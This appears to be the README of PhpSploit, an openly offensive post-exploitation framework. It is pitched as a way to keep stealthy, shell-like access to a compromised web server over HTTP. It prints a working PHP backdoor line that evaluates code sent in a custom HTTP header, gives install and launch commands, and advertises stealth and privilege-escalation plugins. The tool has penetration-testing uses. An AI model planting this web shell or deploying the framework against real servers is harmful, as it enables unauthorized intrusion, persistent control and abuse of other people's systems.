PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"
Efficient: More than 20 plugins to automate post-exploitation tasks
Stealth: The framework is made by paranoids, for paranoids
Convenient: A robust interface with many crucial features
help
)Thanks goes to these people (emoji key):
nil0x42 💻 🚇 🔌 ⚠️ |
shiney-wh 💻 🔌 |
Wannes Rombouts 💻 🚧 |
Amine Ben Asker 💻 🚧 |
jose nazario 📖 🐛 |
Sujit Ghosal 📝 |
Zerdoumi 🐛 |
---|---|---|---|---|---|---|
tristandostaler 🐛 |
Rohan Tarai 🐛 |
This project follows the all-contributors specification. Contributions of any kind welcome!